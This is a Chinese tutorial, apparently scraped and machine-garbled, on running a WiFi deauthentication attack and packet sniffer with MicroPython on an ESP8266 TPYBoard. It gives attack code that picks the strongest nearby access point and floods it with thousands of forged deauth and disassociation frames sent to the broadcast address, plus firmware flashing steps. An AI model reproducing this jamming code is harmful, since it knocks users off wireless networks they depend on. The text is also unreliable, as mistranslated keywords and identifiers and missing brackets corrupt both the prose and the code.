MicroPython实现wifi干扰与抓包

1、0x00前言之前做的WIFI攻击实验都是基于阿尔杜伊诺环境开发的，最近想尝试一下使用micropython完成deautch(解除认证)攻击。本次开发板使用的还是TPYBoard v202(某宝上有卖30岁元)，因为它主要的功能就是支持micropython开发。0x01实现原理a)通过查阅资料和阿尔杜伊诺的源码分析，了解到实现攻击其实就是发送IEEE 802.11协议解除认证包，根据老兄层帧格式发送自定义的虚假deautch数据包。b)调用ESP8266 SDK中wifi_send_pkt_freedom函数，发送攻击包。0x02攻击构思a)程序一开始扫描附件的美联社。b)找到信号最强的美联

2、社，获取到他的老兄地址(bssid)和信道。c)将TPYBoard v202切换到同攻击美联社相同的信道。d)使用攻击美联社的老兄地址，组合deauth解除认证包发送。0x03编译烧写固件及程序源码1 、编译固件现有的微型ython-esp 8266固件中，并没有引出wifi_send_pkt_freedom函数，于是我自己动手编译了一次固件，地址：/PakChoifod/micro ython-deauth大家可以自行下载烧写使用，如果有的小伙伴想自己编译修改固件的话，请参考：/micro ython/micro ython/tree/master/e

3、sp 8266需要注意：在编译esp8266-sdk时，注意版本必须是1.3.0版本，否则wifi_send_pkt_freedom函数会一直返回-1失败。下载后解压，文件如下：firmware.bin文件：micro ython-esp 8266生成的固件。增加的内容：集合攻击函数参数：int类型（信道)功能：设置esp8266的信道send_pkt_freedom函数参数：字节数组（定义的数据包)flash _ download _ tools _ v 3。3 .6 _ win。rar:烧写固件的工具。Uploader.rar缩微胶片文件：用于将程序下载到TPYBoard v202闪存的工

4、具。主。巴拉圭文件：程序源码文件，主要实现附件美联社的扫描、数据包的组合和调用发送。导入时间导入uos导入无线sta _ if=无线。攻击(0)#0:STA模式sta_if.active(真)ap_list=sta_if.scan()打印(ap_list)ssid=bssid=# bssid:AP接入点老兄地址频道=#信道_client=0xFF，0xFF，0xFF，0xFF，0xFF，0xFF#默认def deauth(_ap，_client，类型，原因):# 0 - 1类型，子类型c 0: deauth(a 0:解除关联)# 2 - 3持续时间（由软件开发工具包负责)# 4 - 9接收器（

5、目标)# 10 - 15来源(ap)# 16 - 21 BSSID (ap)# 22 - 23片段序列号# 24 - 25原因代码(1=未指定原因)packet=bytearray(0xC0，0x00，0x00，0x00，0xBB，0xBB，0xBB，0xCC，0xCC，0xCC，0xCC，0xCC，0xCC，0xCC，0xCC，0xCC，0xCC，0x00，0x00，0x01，0x00)对于范围(0，6):内的i数据包4 i=_clienti数据包10 i=数据包16 i=_api#设置类型数据包0=类型；数据包24=原因结果=sta_if.send_pkt_freedom(数据包)如果结果

6、=0:time.sleep_ms(1)返回真else:返回假if _ _ name _ _= _ _ main _ _ :max_rssid=0max_id=0num=0#获取信号最强的美联社进行攻击对于ap_list:中的i如果max_rssid=0:max_rssid=i3#rssidelse:如果i3max_rssid:max_rssid=i3max _ id=数量num=1ssid=ap_listmax_id0bssid=ap_listmax_id1频道=ap_listmax_id2打印(ssid:ssid，-bssid:bssid)打印(-channel:channel，-rssid

7、:max_rssid)sendNum=5000#攻击次数打印(* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *)if sta_if.setAttack(信道):打印（设置攻击正常)time.sleep_ms(100)打印(- deauth runing -)对于范围(0，发送号码):内的ir_=deauth(bssid，_client，0xC0，0x01)if r_:deauth(bssid，_client，0xA0，0x01)deauth(_client，bssid，0xC0，0x01)deauth(_client，b

8、ssid，0xA0，0x01)time.sleep_ms(5)else:打印(- deauth失败-)time.sleep_ms(5000)sniffer文件夹下的Main.py实现网络数据包抓取功能。导入无线导入时间#可指定通道1至13sniffer=wireless.sniffer(6)#0:表示频道从频道1定时切换#sniffer=wireless.sniffer(0)刻录固件1.TPYBoard v202使用微型USB数据线来访问计算机。检查已安装的usb适配器的端口。打开计算机的设备管理器(此处为COM57)。2.解压缩flash _ download _ tools _ v 3 .

9、 3 . 6 _ win.rar，然后双击运行esflashdownload tool _ v3.3.6.exe。3.选择firmware.bin固件文件，地址0x00000，其他参数根据下图设置。我的COM选择COM57，根据他们的实际端口选择，波特率选择。4.单击开始，界面提示等待开机同步。按住主板上的闪光键，同时按下RST键，即可复位并通电。左边的空白区域显示读取的MAC地址，状态显示下载正在进行中。此时只需松开钥匙。5.等待下载完成，然后关闭软件退出。下载程序6.解压缩Uploader.rar文件中的微型目录，双击运行Uploader.exe文件中的微型目录。这个软件需要。NET框架4.2及以上版本。如果打开失败，请安装。NET框架，然后再使用它。NET框架4.5下载地址：主板.com/download/drive/174 .html7.选择COM